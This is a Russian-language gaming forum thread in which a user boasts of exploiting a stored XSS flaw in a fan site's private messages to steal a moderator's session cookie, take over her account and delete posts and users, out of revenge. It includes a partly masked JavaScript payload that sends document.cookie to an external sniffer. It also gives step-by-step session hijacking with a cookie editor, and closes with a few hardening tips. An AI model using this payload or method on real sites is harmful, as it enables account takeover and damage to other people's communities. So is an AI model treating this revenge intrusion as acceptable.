Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Как я нашёл уязвимость на сайте и угнал аккаунт модератора

-

Общение и обсуждение прочих игр

- Обсуждение и вопросы по любым другим онлайн-играм

Ответ
 
Опции темы
Старый 04.01.2014, 23:16   #1
 Разведчик
Аватар для asdfghjkl11
 
asdfghjkl11 никому не известный тип
Регистрация: 03.01.2014
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Как я нашёл уязвимость на сайте и угнал аккаунт модератора

Всем привет!
Дело было вечером, делать было нечего. Решил замутить сканер на XSS ([Ссылки могут видеть только зарегистрированные пользователи. ]) уязвимости. Очень хотелось какой-нибудь сайтик нарушить =), а в ручную задолбаешься уязвимости искать. Нашёл [Ссылки могут видеть только зарегистрированные пользователи. ] хорошую где рассказывалось как найти XSS-уязвимость и как её закрыть.

Вспомнил про один Г*вно-Сайт где меня давным-давно забанили и поржали - какие они крутые модераторы типа... Фан-сайт клиентской он-лайн игры, довольно полезный. Ещё бесило меня что сайт адски лагал с 100 юзерами он-лайн. Админ сайта слёг куда-то. Один очень о*уевший модератор просил каждому (зарегано 8к задров) скинуться по 50 руб. в месяц якобы на хостинг. 45к в месяц просил. Думаю...они че там, дедик купили что-ли мощный. Можно было ведь и хостингом за 500 рублей обойтись. Короче он в карман положить захотел... О чём я..

Полез туда искать уязвимости. Нашёл такую - ">********** блаблабла </script>. Кто не в курсе - через XSS угоняют куки. В очень многих местах оказалась данная уязвимость. Ну чё, думаю. Как бы её применить. Зарегался. Уязвимость оказалась в форме отправки сообщений. т.е. можно отправить скрипт. Отправил кому-то. Смотрю исходящие. Опа, скрипт сработал. Активная XSS атака получается ))) . Весело . Кидаю кому-нибудь этот скрипт который уже ворует куки.
PHP код:
**********
img = new Image();
img.src " тута сниффер  ?"+document.cookie;
</script> 
Смотрю входящие. Ничего не вижу. Пустое исходящее сообщение. Ничего подозрительного короч. Забегаю на сниффер. Опачки, куки упали. Збс. Чищу куки этого ГовноСайта. Гружу сайт. Я не авторизован. Подменяю куки с помощью плагина Cookie Manager для Firefox. Обновляю сайт - я авторизован. Просто прелесть!

Смотрю - кто в чате сидит. А там та королева что забанила меня полтора года назад. Отправляю ей скриптик. Она ничего не подозревая открыла входящие. Я беру её куки и авторизовываюсь. Почистил форум короче, в чате поугорал. Юзеров снёс частично. Ничего сверхкрутого не сделал. Пароль сменить не получилось.

Написал в чате чё надо сделать чтоб я больше не взломал:
- Сделать привязку сессии к IP
- Закрыть "дырки"
- Восстановить сайт из бэкапа

Написал что тот модер денюжки к себе в карман ложит. И т.п.
На следующий день обнаружил что уязвимость в отправке сообщений пропала. Но другие уязвимости остались.
И ещё появился топик в мою честь ламерского содержания.

В общем, Веб программисты, Уделяйте больше внимание безопасности сайта. Вроде всё О_о. Всем добра!

P.S. прогу потом когда нибудь напишу
  Ответить с цитированием
Старый 01.02.2016, 13:19   #2
 Разведчик
Аватар для muzon1121
 
muzon1121 никому не известный тип
Регистрация: 01.02.2016
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Как я нашёл уязвимость на сайте и угнал аккаунт модератора

Круто
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Информация] Flexso угнал аккаунт,воспользовавшись своей репутацией. DSTU Подача заявок и протестов по жалобам 7 29.01.2014 17:08
[Прочее] Уязвимость в skype, позволяющая взломать аккаунт KickeRock97 Халява для Читера 3 26.11.2012 20:01
[Услуги] Купил аккаунт,а вообще неизвестный угнал, его почта - [email protected] Legend_DIE Dark Orbit 9 22.11.2011 15:39

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 03:00.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net